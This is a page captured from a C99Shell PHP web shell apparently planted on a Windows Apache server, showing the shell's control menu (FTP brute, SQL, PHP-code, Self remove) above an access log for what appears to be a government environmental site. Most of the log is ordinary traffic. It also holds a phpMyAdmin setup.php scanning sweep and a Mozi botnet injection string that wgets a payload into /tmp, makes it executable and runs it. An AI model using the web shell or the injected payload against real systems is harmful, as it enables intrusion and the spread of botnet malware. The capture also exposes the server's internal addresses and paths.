!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 9.41 GB of 239.26 GB (3.93%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     access.2022.10.14.log (1.98 MB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
172.22.2.4 - - [14/Oct/2022:00:01:08 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8333
172.22.2.4 - - [14/Oct/2022:00:01:08 -0500] "GET /BLA/boletinlegal/js/ajax_normativa.js HTTP/1.1" 200 1154
172.22.2.4 - - [14/Oct/2022:00:01:08 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [14/Oct/2022:00:01:08 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [14/Oct/2022:00:01:08 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [14/Oct/2022:00:01:08 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [14/Oct/2022:00:01:08 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [14/Oct/2022:00:01:08 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [14/Oct/2022:00:01:08 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [14/Oct/2022:00:01:08 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [14/Oct/2022:00:01:08 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [14/Oct/2022:00:01:08 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [14/Oct/2022:00:01:09 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [14/Oct/2022:00:01:09 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [14/Oct/2022:00:01:09 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [14/Oct/2022:00:01:09 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [14/Oct/2022:00:01:09 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [14/Oct/2022:00:01:09 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [14/Oct/2022:00:01:09 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [14/Oct/2022:00:01:09 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [14/Oct/2022:00:01:09 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [14/Oct/2022:00:01:09 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [14/Oct/2022:00:01:09 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [14/Oct/2022:00:01:09 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [14/Oct/2022:00:01:09 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [14/Oct/2022:00:01:09 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [14/Oct/2022:00:01:09 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [14/Oct/2022:00:01:09 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1334
172.22.2.4 - - [14/Oct/2022:00:01:28 -0500] "GET /BLA/boletinlegal/consulta_normativa.php?tipo=&sector=residuos&ano=&resuelve= HTTP/1.1" 200 20100
172.22.2.4 - - [14/Oct/2022:00:01:28 -0500] "GET /BLA/boletinlegal/images/docs.png HTTP/1.1" 200 10288
172.22.2.4 - - [14/Oct/2022:00:01:28 -0500] "GET /BLA/boletinlegal/images/background.gif HTTP/1.1" 200 -
191.95.173.187 - - [14/Oct/2022:00:01:37 -0500] "GET /la-secretaria-de-ambiente-abre-nueva-convocatoria-para-su-programa-de-voluntariado-ambiental.html HTTP/1.1" 200 976
173.252.83.2 - - [14/Oct/2022:00:01:52 -0500] "GET /images/jardines-verticales-4-marzo.jpg HTTP/1.1" 200 54804
172.22.2.4 - - [14/Oct/2022:00:00:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [14/Oct/2022:00:02:23 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2022:00:02:40 -0500] "GET /BLA/boletinlegal/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1" 404 1018
172.22.2.4 - - [14/Oct/2022:00:01:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
207.46.13.40 - - [14/Oct/2022:00:03:08 -0500] "GET /BLA/resoluciones/00000859.tif HTTP/1.1" 404 1018
201.245.192.253 - - [14/Oct/2022:00:03:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
173.231.60.194 - - [14/Oct/2022:00:03:54 -0500] "-" 408 -
172.22.2.4 - - [14/Oct/2022:00:05:10 -0500] "GET /BLA/boletinlegal/Circulares/2020/Circular%20No.%2000018%20del%2002%20de%20diciembre%20del%202020.pdf HTTP/1.1" 304 -
173.231.60.194 - - [14/Oct/2022:00:05:54 -0500] "-" 408 -
191.156.131.48 - - [14/Oct/2022:00:06:34 -0500] "-" 408 -
181.152.216.43 - - [14/Oct/2022:00:07:07 -0500] "GET /la-secretaria-de-ambiente-abre-nueva-convocatoria-para-su-programa-de-voluntariado-ambiental.html HTTP/1.1" 200 976
200.119.34.50 - - [14/Oct/2022:00:07:08 -0500] "GET /la-secretaria-de-ambiente-abre-nueva-convocatoria-para-su-programa-de-voluntariado-ambiental.html HTTP/1.1" 200 976
216.245.221.92 - - [14/Oct/2022:00:07:23 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2022:00:06:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2022:00:08:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
172.22.2.4 - - [14/Oct/2022:00:07:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55220
181.53.13.143 - - [14/Oct/2022:00:11:09 -0500] "GET /la-secretaria-de-ambiente-abre-nueva-convocatoria-para-su-programa-de-voluntariado-ambiental.html HTTP/1.1" 200 976
186.86.32.65 - - [14/Oct/2022:00:11:13 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
186.86.32.65 - - [14/Oct/2022:00:11:13 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
186.86.32.65 - - [14/Oct/2022:00:11:13 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
216.245.221.92 - - [14/Oct/2022:00:12:23 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2022:00:13:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
172.22.2.4 - - [14/Oct/2022:00:12:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
152.61.192.232 - - [14/Oct/2022:00:14:20 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [14/Oct/2022:00:12:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
216.245.221.92 - - [14/Oct/2022:00:17:23 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2022:00:18:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
173.252.107.2 - - [14/Oct/2022:00:19:25 -0500] "GET /distrito-declara-alerta-ambiental-por-calidad-del-aire-y-apoyara-extincion-de-incendios-en-la-amazonia.html HTTP/1.1" 206 928
172.22.2.4 - - [14/Oct/2022:00:17:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
152.61.128.50 - - [14/Oct/2022:00:20:17 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [14/Oct/2022:00:18:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
201.245.192.253 - - [14/Oct/2022:00:22:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43245
201.245.192.253 - - [14/Oct/2022:00:22:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42959
216.245.221.92 - - [14/Oct/2022:00:22:23 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.100 - - [14/Oct/2022:00:22:39 -0500] "-" 408 -
201.245.192.253 - - [14/Oct/2022:00:23:33 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
172.22.2.4 - - [14/Oct/2022:00:23:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2022:00:24:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54356
216.245.221.92 - - [14/Oct/2022:00:27:23 -0500] "HEAD / HTTP/1.1" 200 -
54.176.147.190 - - [14/Oct/2022:00:28:25 -0500] "GET http://190.27.245.106:80/phpMyAdmin2/scripts/setup.php HTTP/1.0" 403 1165
54.176.147.190 - - [14/Oct/2022:00:28:28 -0500] "GET http://190.27.245.106:80/dbadmin/scripts/setup.php HTTP/1.0" 404 1018
54.176.147.190 - - [14/Oct/2022:00:28:28 -0500] "GET http://190.27.245.106:80/mysql/scripts/setup.php HTTP/1.0" 404 1018
54.176.147.190 - - [14/Oct/2022:00:28:28 -0500] "GET http://190.27.245.106:80/myadmin/scripts/setup.php HTTP/1.0" 404 1018
54.176.147.190 - - [14/Oct/2022:00:28:28 -0500] "GET http://190.27.245.106:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 403 1165
54.176.147.190 - - [14/Oct/2022:00:28:28 -0500] "GET http://190.27.245.106:80/pma/scripts/setup.php HTTP/1.0" 404 1018
54.176.147.190 - - [14/Oct/2022:00:28:28 -0500] "GET http://190.27.245.106:80/phpmyadmin/scripts/setup.php HTTP/1.0" 403 1165
54.176.147.190 - - [14/Oct/2022:00:28:28 -0500] "GET http://190.27.245.106:80/admin/scripts/setup.php HTTP/1.0" 404 1018
201.245.192.253 - - [14/Oct/2022:00:28:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
172.22.2.4 - - [14/Oct/2022:00:29:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2022:00:30:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55220
201.245.192.253 - - [14/Oct/2022:00:32:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43245
201.245.192.253 - - [14/Oct/2022:00:32:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42959
216.245.221.92 - - [14/Oct/2022:00:32:23 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2022:00:32:43 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/ANALISIST-257-96.docx HTTP/1.1" 304 -
157.55.39.25 - - [14/Oct/2022:00:33:21 -0500] "GET /galeria/galeria/fotos/4humedal-Burro4G.jpg HTTP/1.1" 200 98452
201.245.192.253 - - [14/Oct/2022:00:33:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
42.230.226.200 - - [14/Oct/2022:00:33:45 -0500] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 946
181.55.68.44 - - [14/Oct/2022:00:34:21 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
181.55.68.44 - - [14/Oct/2022:00:34:29 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2021%2F HTTP/1.1" 200 394794
186.84.20.139 - - [14/Oct/2022:00:34:39 -0500] "GET /la-secretaria-de-ambiente-abre-nueva-convocatoria-para-su-programa-de-voluntariado-ambiental.html HTTP/1.1" 200 976
181.55.68.44 - - [14/Oct/2022:00:34:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/1695.pdf HTTP/1.1" 200 376500
181.55.68.44 - - [14/Oct/2022:00:34:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/1695.pdf HTTP/1.1" 200 376500
181.55.68.44 - - [14/Oct/2022:00:34:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/1695.pdf HTTP/1.1" 206 1025
181.55.68.44 - - [14/Oct/2022:00:34:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/1695.pdf HTTP/1.1" 206 3072
181.55.68.44 - - [14/Oct/2022:00:34:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/1695.pdf HTTP/1.1" 206 372403
181.55.68.44 - - [14/Oct/2022:00:35:03 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
172.22.2.4 - - [14/Oct/2022:00:35:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [14/Oct/2022:00:37:23 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2022:00:36:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56014
201.245.192.253 - - [14/Oct/2022:00:38:30 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
207.46.13.40 - - [14/Oct/2022:00:39:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20851-900/00000852.tif HTTP/1.1" 200 102838
207.46.13.40 - - [14/Oct/2022:00:41:53 -0500] "GET /autoliquidacion2020/index.php?dir=Calidad+del+aire+auditiva+y+visual-%2FEvaluaci%F3n+de+estudios+de+Emisiones+con+miras+a+verificar+el+cumplimiento+de+las+normas+de+emisiones%2F HTTP/1.1" 200 3007
201.245.192.253 - - [14/Oct/2022:00:42:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43245
201.245.192.253 - - [14/Oct/2022:00:42:03 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42959
216.245.221.92 - - [14/Oct/2022:00:42:23 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2022:00:41:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2022:00:43:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
172.22.2.4 - - [14/Oct/2022:00:43:32 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-095-16.docx HTTP/1.1" 200 20284
172.22.2.4 - - [14/Oct/2022:00:42:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
207.46.13.40 - - [14/Oct/2022:00:46:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0455.pdf HTTP/1.1" 200 351353
157.55.39.25 - - [14/Oct/2022:00:47:05 -0500] "GET /bla/resoluciones/autos%202020/1056.pdf HTTP/1.1" 200 361165
216.245.221.92 - - [14/Oct/2022:00:47:23 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2022:00:46:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56732
173.252.107.120 - - [14/Oct/2022:00:48:11 -0500] "GET /asi-es-el-tramite-para-obtener-el-certificado-de-conservacion-ambiental-2022.html HTTP/1.1" 206 935
201.185.101.240 - - [14/Oct/2022:00:48:29 -0500] "GET /la-secretaria-de-ambiente-abre-nueva-convocatoria-para-su-programa-de-voluntariado-ambiental.html HTTP/1.1" 200 976
201.245.192.253 - - [14/Oct/2022:00:48:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
172.22.2.4 - - [14/Oct/2022:00:47:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2022:00:49:17 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%204%20del%2019%20de%20abril%20de%202012.pdf HTTP/1.1" 304 -
201.185.101.240 - - [14/Oct/2022:00:49:19 -0500] "GET /si-tienes-ropa-y-calzado-que-ya-no-usas-aca-te-presentamos-seis-puntos-a-donde-los-puedes-llevar.html HTTP/1.1" 200 872
172.22.2.4 - - [14/Oct/2022:00:47:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56732
172.22.2.4 - - [14/Oct/2022:00:50:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 62772
216.245.221.92 - - [14/Oct/2022:00:52:23 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2022:00:53:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
172.22.2.4 - - [14/Oct/2022:00:52:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.40 - - [14/Oct/2022:00:55:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202000/2000%20500-549.tif HTTP/1.1" 200 4589773
172.22.2.4 - - [14/Oct/2022:00:53:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53290
66.249.73.127 - - [14/Oct/2022:00:55:28 -0500] "-" 408 -
207.46.13.89 - - [14/Oct/2022:00:55:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20851-900/00000895.tif HTTP/1.1" 200 145656
201.185.144.94 - - [14/Oct/2022:00:55:38 -0500] "GET /la-secretaria-de-ambiente-abre-nueva-convocatoria-para-su-programa-de-voluntariado-ambiental.html HTTP/1.1" 200 976
216.245.221.92 - - [14/Oct/2022:00:57:23 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2022:00:58:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
152.61.192.232 - - [14/Oct/2022:00:58:31 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.192.232 - - [14/Oct/2022:00:58:33 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.192.232 - - [14/Oct/2022:00:58:33 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
172.22.2.4 - - [14/Oct/2022:01:00:16 -0500] "GET /BLA/boletinlegal/Directivas/2016/Directiva%20No.%2001%20del%2012%20de%20Abril%20de%202016.pdf HTTP/1.1" 304 -
172.22.2.4 - - [14/Oct/2022:00:58:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2022:00:59:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
216.245.221.92 - - [14/Oct/2022:01:02:23 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2022:01:03:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
157.55.39.202 - - [14/Oct/2022:01:03:56 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Diseno%20pertenecientes%20al%20mobiliario%20urbano%20M10-M160/PARTE%20A/Dise%C3%B1o%20de%20Elementos%20M-10.pdf HTTP/1.1" 304 -
172.22.2.4 - - [14/Oct/2022:01:04:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2022:01:05:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
216.245.221.92 - - [14/Oct/2022:01:07:23 -0500] "HEAD / HTTP/1.1" 200 -
152.61.128.50 - - [14/Oct/2022:01:08:24 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
201.245.192.253 - - [14/Oct/2022:01:08:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
152.61.128.50 - - [14/Oct/2022:01:08:26 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.128.50 - - [14/Oct/2022:01:08:26 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
172.22.2.4 - - [14/Oct/2022:01:08:45 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-095-16.docx HTTP/1.1" 200 20284
172.22.2.4 - - [14/Oct/2022:01:10:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [14/Oct/2022:01:12:23 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2022:01:11:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
201.245.192.253 - - [14/Oct/2022:01:13:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
157.55.39.25 - - [14/Oct/2022:01:17:05 -0500] "GET /BLA/resoluciones/AUTOS%202014/1572.pdf HTTP/1.1" 200 748076
216.245.221.92 - - [14/Oct/2022:01:17:23 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2022:01:16:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2022:01:18:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
172.22.2.4 - - [14/Oct/2022:01:17:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
207.46.13.40 - - [14/Oct/2022:01:19:48 -0500] "GET /BLA/resoluciones/AUTOS%202022/1297.pdf HTTP/1.1" 200 788560
181.55.68.44 - - [14/Oct/2022:01:20:58 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
181.55.68.44 - - [14/Oct/2022:01:21:02 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2021%2F HTTP/1.1" 200 394794
181.55.68.44 - - [14/Oct/2022:01:21:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/2231.pdf HTTP/1.1" 200 387017
181.55.68.44 - - [14/Oct/2022:01:21:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/2231.pdf HTTP/1.1" 200 387017
181.55.68.44 - - [14/Oct/2022:01:21:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/2231.pdf HTTP/1.1" 206 1025
181.55.68.44 - - [14/Oct/2022:01:21:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/2231.pdf HTTP/1.1" 206 3072
181.55.68.44 - - [14/Oct/2022:01:21:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/2231.pdf HTTP/1.1" 206 382920
181.55.68.44 - - [14/Oct/2022:01:21:27 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
181.55.68.44 - - [14/Oct/2022:01:21:29 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2021%2F HTTP/1.1" 200 394794
181.55.68.44 - - [14/Oct/2022:01:21:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/2231.pdf HTTP/1.1" 206 1
181.55.68.44 - - [14/Oct/2022:01:21:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/2231.pdf HTTP/1.1" 206 242749
201.245.192.253 - - [14/Oct/2022:01:22:00 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43235
201.245.192.253 - - [14/Oct/2022:01:22:03 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43110
216.245.221.92 - - [14/Oct/2022:01:22:23 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2022:01:23:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
172.22.2.4 - - [14/Oct/2022:01:22:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2022:01:22:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
216.245.221.92 - - [14/Oct/2022:01:27:23 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.89 - - [14/Oct/2022:01:27:58 -0500] "GET /BLA/resoluciones/00000854.tif HTTP/1.1" 404 1018
201.245.192.253 - - [14/Oct/2022:01:28:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
172.22.2.4 - - [14/Oct/2022:01:27:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2022:01:28:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
201.245.192.253 - - [14/Oct/2022:01:32:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43235
201.245.192.253 - - [14/Oct/2022:01:32:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43110
216.245.221.92 - - [14/Oct/2022:01:32:23 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2022:01:33:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
66.220.149.20 - - [14/Oct/2022:01:33:30 -0500] "GET /images/mercados-campesinos-5-mayo.jpg HTTP/1.1" 200 95848
208.100.26.237 - - [14/Oct/2022:01:33:54 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [14/Oct/2022:01:33:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2022:01:34:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56732
207.46.13.89 - - [14/Oct/2022:01:36:39 -0500] "GET /BLA/resoluciones/00001789.tif HTTP/1.1" 404 1018
216.245.221.92 - - [14/Oct/2022:01:37:23 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2022:01:38:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
66.249.73.84 - - [14/Oct/2022:01:39:40 -0500] "-" 408 -
157.55.39.202 - - [14/Oct/2022:01:41:09 -0500] "GET /BLA/resoluciones/00000890.tif HTTP/1.1" 404 1018
172.22.2.4 - - [14/Oct/2022:01:39:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2022:01:40:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
201.245.192.253 - - [14/Oct/2022:01:42:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43235
201.245.192.253 - - [14/Oct/2022:01:42:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43110
216.245.221.92 - - [14/Oct/2022:01:42:23 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2022:01:43:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
172.22.2.4 - - [14/Oct/2022:01:45:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.177 - - [14/Oct/2022:01:47:09 -0500] "GET /portaldeninos/aula-ambiental-artistica-itinerante-auambari/ HTTP/1.1" 200 89306
207.46.13.177 - - [14/Oct/2022:01:47:18 -0500] "GET /portaldeninos/aula-ambiental-artistica-itinerante-auambari/ HTTP/1.1" 200 89306
207.46.13.84 - - [14/Oct/2022:01:47:22 -0500] "GET /BLA/resoluciones/00000863.tif HTTP/1.1" 404 1018
216.245.221.92 - - [14/Oct/2022:01:47:23 -0500] "HEAD / HTTP/1.1" 200 -
191.108.35.175 - - [14/Oct/2022:01:47:29 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
191.108.35.175 - - [14/Oct/2022:01:47:38 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2021%2F HTTP/1.1" 200 426713
172.22.2.4 - - [14/Oct/2022:01:46:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56732
191.108.35.175 - - [14/Oct/2022:01:48:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1018.pdf HTTP/1.1" 200 744602
201.245.192.253 - - [14/Oct/2022:01:48:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
